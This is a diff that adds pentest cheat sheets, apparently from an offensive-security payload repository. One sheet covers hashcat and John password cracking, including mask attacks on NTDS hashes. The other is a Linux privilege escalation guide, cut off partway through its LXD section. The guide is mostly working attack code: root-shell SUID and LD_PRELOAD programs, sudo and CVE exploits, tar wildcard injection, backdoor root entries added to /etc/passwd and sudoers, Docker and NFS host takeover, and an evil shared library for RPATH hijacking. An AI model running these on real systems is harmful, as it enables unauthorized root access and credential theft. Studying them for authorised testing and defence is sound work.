+## Summary + +* [Hashcat](https://hashcat.net/hashcat/) + * [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) + * [Hashcat Install](#hashcat-install) + * [Mask attack](#mask-attack) + * [Dictionary](#dictionary) +* [John](https://github.com/openwall/john) + * [Usage](#john-usage) +* [Rainbow tables](#rainbow-tables) +* [Tips and Tricks](#tips-and-tricks) +* [Online Cracking Resources](#online-cracking-resources) +* [References](#references) + + +## Hashcat + +### Hashcat Install + +```powershell +apt install cmake build-essential -y +apt install checkinstall git -y +git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install +``` + +1. Extract the hash +2. Get the hash format: https://hashcat.net/wiki/doku.php?id=example_hashes +3. Establish a cracking stratgy based on hash format (ex: wordlist -> wordlist + rules -> mask -> combinator mode -> prince attack -> ...) +4. Enjoy plains +5. Review strategy +6. Start over + +### Dictionary + +> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash. + +```powershell +hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -r $my_rules +``` + +* Wordlists + * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/) + * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z) + * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z) + * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z) + * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz) + * [hashmob.net](https://hashmob.net/research/wordlists) + * [clem9669/wordlists](https://github.com/clem9669/wordlists) + +* Rules + * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/) + * [nsa-rules](https://github.com/NSAKEY/nsa-rules) + * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule) + * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule) + * [clem9669/hashcat-rule](https://github.com/clem9669/hashcat-rule) + +### Mask attack + +Mask attack is an attack mode which optimize brute-force. + +> Every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash. + +```powershell +# Mask: upper*1+lower*5+digit*2 and upper*1+lower*6+digit*2 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?l?d?d?1 + +# Mask: upper*1+lower*3+digit*4 and upper*1+lower*3+digit*4 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?d?d?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?d?d?d?d?1 + +# Mask: lower*6 + digit*2 + special digit(+!?*) +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1?1 + +# Mask: lower*6 + digit*2 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 + +# Other examples +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d?d?d +hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a?a?a?a?a" +hashcat --attack-mode 3 --hash-type $number $hashes_file "?u?l?l?l?d?d?d?d?s" +hashcat --attack-mode 3 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a" +hashcat --attack-mode 3 --custom-charset1 "?u" --custom-charset2 "?l?u?d" --custom-charset3 "?d" --hash-type $number $hashes_file "?1?2?2?2?3" +``` + +| Shortcut | Characters | +|----|----------------------------| +| ?l | abcdefghijklmnopqrstuvwxyz | +| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | +| ?d | 0123456789 | +| ?s | !"#$%&'()*+,-./:;<=>?@[\]^_`{}~ | +| ?a | ?l?u?d?s | +| ?b | 0x00 - 0xff | + + + +## John + + +### John Usage + +```bash +# Run on password file containing hashes to be cracked +john passwd + +# Use a specific wordlist +john --wordlist= passwd + +# Use a specific wordlist with rules +john --wordlist= passwd --rules=Jumbo + +# Show cracked passwords +john --show passwd + +# Restore interrupted sessions +john --restore +``` + + +## Rainbow tables + +> The hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant) + +## Tips and Tricks + +* Cloud GPU + * [penglab - Abuse of Google Colab for cracking hashes. 🐧](https://github.com/mxrch/penglab) + * [google-colab-hashcat - Google colab hash cracking](https://github.com/ShutdownRepo/google-colab-hashcat) + * [Cloudtopolis - Zero Infrastructure Password Cracking](https://github.com/JoelGMSec/Cloudtopolis) + * [Nephelees - also a NTDS cracking tool abusing Google Colab](https://github.com/swisskyrepo/Nephelees) +* Build a rig on premise + * [Pentester's Portable Cracking Rig - $1000](https://www.netmux.com/blog/portable-cracking-rig) + * [How To Build A Password Cracking Rig - 5000$](https://www.netmux.com/blog/how-to-build-a-password-cracking-rig) +* Online cracking + * [Hashes.com](https://hashes.com/en/decrypt/hash) + * [hashmob.net](https://hashmob.net/): great community with Discord +* Use the `loopback` in combination with rules and dictionary to keep cracking until you don't find new passsword: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file` +* PACK (Password Analysis and Cracking Kit) + * https://github.com/iphelix/pack/blob/master/README + * Can produce custom hcmask files to use with hashcat, based on statistics and rules applied on an input dataset +* Use Deep Learning + * [brannondorsey/PassGAN](https://github.com/brannondorsey/PassGAN) + + +## Online Cracking Resources + +* [hashes.com](https://hashes.com) +* [crackstation](https://crackstation.net) +* [Hashmob](https://hashmob.net/) + + +## References + +* [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking) +* [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/) +* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript) +* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript) +* [DeepPass — Finding Passwords With Deep Learning - Will Schroeder - Jun 1](https://posts.specterops.io/deeppass-finding-passwords-with-deep-learning-4d31c534cd00) \ No newline at end of file diff --git a/docs/pentest/Linux - Privilege Escalation.md b/docs/pentest/Linux - Privilege Escalation.md new file mode 100644 index 0000000..220931c --- /dev/null +++ b/docs/pentest/Linux - Privilege Escalation.md @@ -0,0 +1,832 @@ +# Linux - Privilege Escalation + +## Summary + +* [Tools](#tools) +* [Checklist](#checklists) +* [Looting for passwords](#looting-for-passwords) + * [Files containing passwords](#files-containing-passwords) + * [Old passwords in /etc/security/opasswd](#old-passwords-in-etcsecurityopasswd) + * [Last edited files](#last-edited-files) + * [In memory passwords](#in-memory-passwords) + * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](#sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) +* [Scheduled tasks](#scheduled-tasks) + * [Cron jobs](#cron-jobs) + * [Systemd timers](#systemd-timers) +* [SUID](#suid) + * [Find SUID binaries](#find-suid-binaries) + * [Create a SUID binary](#create-a-suid-binary) +* [Capabilities](#capabilities) + * [List capabilities of binaries](#list-capabilities-of-binaries) + * [Edit capabilities](#edit-capabilities) + * [Interesting capabilities](#interesting-capabilities) +* [SUDO](#sudo) + * [NOPASSWD](#nopasswd) + * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) + * [Doas](#doas) + * [sudo_inject](#sudo_inject) + * [CVE-2019-14287](#cve-2019-14287) +* [GTFOBins](#gtfobins) +* [Wildcard](#wildcard) +* [Writable files](#writable-files) + * [Writable /etc/passwd](#writable-etcpasswd) + * [Writable /etc/sudoers](#writable-etcsudoers) +* [NFS Root Squashing](#nfs-root-squashing) +* [Shared Library](#shared-library) + * [ldconfig](#ldconfig) + * [RPATH](#rpath) +* [Groups](#groups) + * [Docker](#docker) + * [LXC/LXD](#lxclxd) +* [Hijack TMUX session](#hijack-tmux-session) +* [Kernel Exploits](#kernel-exploits) + * [CVE-2022-0847 (DirtyPipe)](#cve-2022-0847-dirtypipe) + * [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#cve-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#cve-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#cve-2012-0056-mempodipper) + + +## Tools + +There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors. +Here are a few: + +- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) + + ```powershell + wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh + curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh + ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. + ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. + ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users + ``` + +- [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration) + + ```powershell + wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh + curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh + ./lse.sh -l1 # shows interesting information that should help you to privesc + ./lse.sh -l2 # dump all the information it gathers about the system + ``` + +- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) + + ```powershell + ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t + ``` + +- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) +- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) +- [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) + + +## Checklists + +* Kernel and distribution release details +* System Information: + * Hostname + * Networking details: + * Current IP + * Default route details + * DNS server information +* User Information: + * Current user details + * Last logged on users + * Shows users logged onto the host + * List all users including uid/gid information + * List root accounts + * Extracts password policies and hash storage method information + * Checks umask value + * Checks if password hashes are stored in /etc/passwd + * Extract full details for 'default' uid's such as 0, 1000, 1001 etc + * Attempt to read restricted files i.e. /etc/shadow + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) + * Basic SSH checks +* Privileged access: + * Which users have recently used sudo + * Determine if /etc/sudoers is accessible + * Determine if the current user has Sudo access without a password + * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.) + * Is root's home directory accessible + * List permissions for /home/ +* Environmental: + * Display current $PATH + * Displays env information +* Jobs/Tasks: + * List all cron jobs + * Locate all world-writable cron jobs + * Locate cron jobs owned by other users of the system + * List the active and inactive systemd timers +* Services: + * List network connections (TCP & UDP) + * List running processes + * Lookup and list process binaries and associated permissions + * List inetd.conf/xined.conf contents and associated binary file permissions + * List init.d binary permissions +* Version Information (of the following): + * Sudo + * MYSQL + * Postgres + * Apache + * Checks user config + * Shows enabled modules + * Checks for htpasswd files + * View www directories +* Default/Weak Credentials: + * Checks for default/weak Postgres accounts + * Checks for default/weak MYSQL accounts +* Searches: + * Locate all SUID/GUID files + * Locate all world-writable SUID/GUID files + * Locate all SUID/GUID files owned by root + * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc) + * Locate files with POSIX capabilities + * List all world-writable files + * Find/list all accessible *.plan files and display contents + * Find/list all accessible *.rhosts files and display contents + * Show NFS server details + * Locate *.conf and *.log files containing keyword supplied at script runtime + * List all *.conf files located in /etc + * Locate mail +* Platform/software specific tests: + * Checks to determine if we're in a Docker container + * Checks to see if the host has Docker installed + * Checks to determine if we're in an LXC container + +## Looting for passwords + +### Files containing passwords + +```powershell +grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null +find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; +``` + +### Old passwords in /etc/security/opasswd + +The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. + +:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes + + +### Last edited files + +Files that were edited in the last 10 minutes + +```powershell +find / -mmin -10 2>/dev/null | grep -Ev "^/proc" +``` + +### In memory passwords + +```powershell +strings /dev/mem -n10 | grep -i PASS +``` + +### Find sensitive files + +```powershell +$ locate password | more +/boot/grub/i386-pc/password.mod +/etc/pam.d/common-password +/etc/pam.d/gdm-password +/etc/pam.d/gdm-password.original +/lib/live/config/0031-root-password +... +``` + +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + +## Scheduled tasks + +### Cron jobs + +Check if you have access with write permission on these files. +Check inside the file, to find other paths with write permissions. + +```powershell +/etc/init.d +/etc/cron* +/etc/crontab +/etc/cron.allow +/etc/cron.d +/etc/cron.deny +/etc/cron.daily +/etc/cron.hourly +/etc/cron.monthly +/etc/cron.weekly +/etc/sudoers +/etc/exports +/etc/anacrontab +/var/spool/cron +/var/spool/cron/crontabs/root + +crontab -l +ls -alh /var/spool/cron; +ls -al /etc/ | grep cron +ls -al /etc/cron* +cat /etc/cron* +cat /etc/at.allow +cat /etc/at.deny +cat /etc/cron.allow +cat /etc/cron.deny* +``` + +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. + +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + +## Systemd timers + +```powershell +systemctl list-timers --all +NEXT LEFT LAST PASSED UNIT ACTIVATES +Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service +Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service +Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service + +3 timers listed. +``` + +## SUID + +SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. + +```powershell +╭─swissky@lab ~ +╰─$ ls /usr/bin/sudo -alh +-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo +``` + +### Find SUID binaries + +```bash +find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; +find / -uid 0 -perm -4000 -type f 2>/dev/null +``` + +### Create a SUID binary + +| Function | Description | +|------------|---| +| setreuid() | sets real and effective user IDs of the calling process | +| setuid() | sets the effective user ID of the calling process | +| setgid() | sets the effective group ID of the calling process | + + +```bash +print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c +gcc -o /tmp/suid /tmp/suid.c +sudo chmod +x /tmp/suid # execute right +sudo chmod +s /tmp/suid # setuid bit +``` + + +## Capabilities + +### List capabilities of binaries + +```powershell +╭─swissky@lab ~ +╰─$ /usr/bin/getcap -r /usr/bin +/usr/bin/fping = cap_net_raw+ep +/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip +/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep +/usr/bin/rlogin = cap_net_bind_service+ep +/usr/bin/ping = cap_net_raw+ep +/usr/bin/rsh = cap_net_bind_service+ep +/usr/bin/rcp = cap_net_bind_service+ep +``` + +### Edit capabilities + +```powershell +/usr/bin/setcap -r /bin/ping # remove +/usr/bin/setcap cap_net_raw+p /bin/ping # add +``` + +### Interesting capabilities + +Having the capability =ep means the binary has all the capabilities. +```powershell +$ getcap openssl /usr/bin/openssl +openssl=ep +``` + +Alternatively the following capabilities can be used in order to upgrade your current privileges. + +```powershell +cap_dac_read_search # read anything +cap_setuid+ep # setuid +``` + +Example of privilege escalation with `cap_setuid+ep` + +```powershell +$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 + +$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' +sh-5.0# id +uid=0(root) gid=1000(swissky) +``` + +| Capabilities name | Description | +|---|---| +| CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing | +| CAP_AUDIT_WRITE | Helps to write records to kernel auditing log | +| CAP_BLOCK_SUSPEND | This feature can block system suspends | +| CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs | +| CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks | +| CAP_DAC_READ_SEARCH | This only bypasses file and directory read/execute permission checks | +| CAP_FOWNER | This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | +| CAP_KILL | Allow the sending of signals to processes belonging to others | +| CAP_SETGID | Allow changing of the GID | +| CAP_SETUID | Allow changing of the UID | +| CAP_SETPCAP | Helps to transferring and removal of current set to any PID | +| CAP_IPC_LOCK | This helps to lock memory | +| CAP_MAC_ADMIN | Allow MAC configuration or state changes | +| CAP_NET_RAW | Use RAW and PACKET sockets | +| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | + +## SUDO + +Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) + +### NOPASSWD + +Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. + +```bash +$ sudo -l + +User demo may run the following commands on crashlab: + (root) NOPASSWD: /usr/bin/vim +``` + +In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. + +```bash +sudo vim -c '!sh' +sudo -u root vim -c '!sh' +``` + +### LD_PRELOAD and NOPASSWD + +If `LD_PRELOAD` is explicitly defined in the sudoers file + +```powershell +Defaults env_keep += LD_PRELOAD +``` + +Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` + +```c +#include +#include +#include +#include +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/sh"); +} +``` + +Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD= `, e.g: `sudo LD_PRELOAD=/tmp/shell.so find` + +### Doas + +There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` + +```bash +permit nopass demo as root cmd vim +``` + +### sudo_inject + +Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) + +```powershell +$ sudo whatever +[sudo] password for user: +# Press +c since you don't have the password. +# This creates an invalid sudo tokens. +$ sh exploit.sh +.... wait 1 seconds +$ sudo -i # no password required :) +# id +uid=0(root) gid=0(root) groups=0(root) +``` + +Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + + +### CVE-2019-14287 + +```powershell +# Exploitable when a user have the following permissions (sudo -l) +(ALL, !root) ALL + +# If you have a full TTY, you can exploit it like this +sudo -u#-1 /bin/bash +sudo -u#4294967295 id +``` + +## GTFOBins + +[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. + +The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. + +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '\! /bin/sh' +> strace -o /dev/null /bin/sh +> sudo awk 'BEGIN {system("/bin/sh")}' + + +## Wildcard + +By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy. + +```powershell +# create file for exploitation +touch -- "--checkpoint=1" +touch -- "--checkpoint-action=exec=sh shell.sh" +echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh + +# vulnerable script +tar cf archive.tar * +``` + +Tool: [wildpwn](https://github.com/localh0t/wildpwn) + +## Writable files + +List world writable files on the system. + +```powershell +find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +find / -perm -2 -type f 2>/dev/null +find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null +``` + +### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) + +/etc/sysconfig/network-scripts/ifcfg-1337 for example + +```powershell +NAME=Network /bin/id <= Note the blank space +ONBOOT=yes +DEVICE=eth0 + +EXEC : +./etc/sysconfig/network-scripts/ifcfg-1337 +``` +src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) + +### Writable /etc/passwd + +First generate a password with one of the following commands. + +```powershell +openssl passwd -1 -salt hacker hacker +mkpasswd -m SHA-512 hacker +python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' +``` + +Then add the user `hacker` and add the generated password. + +```powershell +hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash +``` + +E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` + +You can now use the `su` command with `hacker:hacker` + +Alternatively you can use the following lines to add a dummy user without a password. +WARNING: you might degrade the current security of the machine. + +```powershell +echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd +su - dummy +``` + +NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. + +### Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers +``` + +## NFS Root Squashing + +When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it. + +```powershell +# remote check the name of the folder +showmount -e 10.10.10.10 + +# create dir +mkdir /tmp/nfsdir + +# mount directory +mount -t nfs 10.10.10.10:/shared /tmp/nfsdir +cd /tmp/nfsdir + +# copy wanted shell +cp /bin/bash . + +# set suid permission +chmod +s bash +``` + +## Shared Library + +### ldconfig + +Identify shared libraries with `ldd` + +```powershell +$ ldd /opt/binary + linux-vdso.so.1 (0x00007ffe961cd000) + vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000) + /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000) +``` + +Create a library in `/tmp` and activate the path. + +```powershell +gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c +echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so +/opt/binary +``` + +### RPATH + +```powershell +level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" + 0x00000001 (NEEDED) Shared library: [libc.so.6] + 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x0068c000) + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x005bb000) +``` + +By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. + +```powershell +level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x005b0000) + libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x00737000) +``` + +Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` + +```powershell +#include +#define SHELL "/bin/sh" + +int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) +{ + char *file = SHELL; + char *argv[] = {SHELL,0}; + setresuid(geteuid(),geteuid(), geteuid()); + execve(file,argv,0); +} +``` + +## Groups + +### Docker + +Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. + +```bash +$> docker run -it --rm -v $PWD:/mnt bash +$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd +``` + +Almost similar but you will also see all processes running on the host and be connected to the same NICs. + +```powershell +docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash +``` + +Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell + +```powershell +$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease +latest: Pulling from chrisfosterelli/rootplease +2de59b831a23: Pull complete +354c3661655e: Pull complete +91930878a2d7: Pull complete +a3ed95caeb02: Pull complete +489b110c54dc: Pull complete +Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 +Status: Downloaded newer image for chrisfosterelli/rootplease:latest + +You should now have a root shell on the host OS +Press Ctrl-D to exit the docker instance / shell + +sh-5.0# id +uid=0(root) gid=0(root) groups=0(root) +``` + +More docker privilege escalation using the Docker Socket. + +```powershell +sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + +### LXC/LXD + +The privesc requires to run a container with elevated privileges and mount the host filesystem inside. + +```powershell +╭─swissky@lab ~ +╰─$ id +uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) +``` + +Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. + +```powershell +# build a simple alpine image +git clone https://github.com/saghul/lxd-alpine-builder +./build-alpine -a i686 + +# import the image +lxc image import 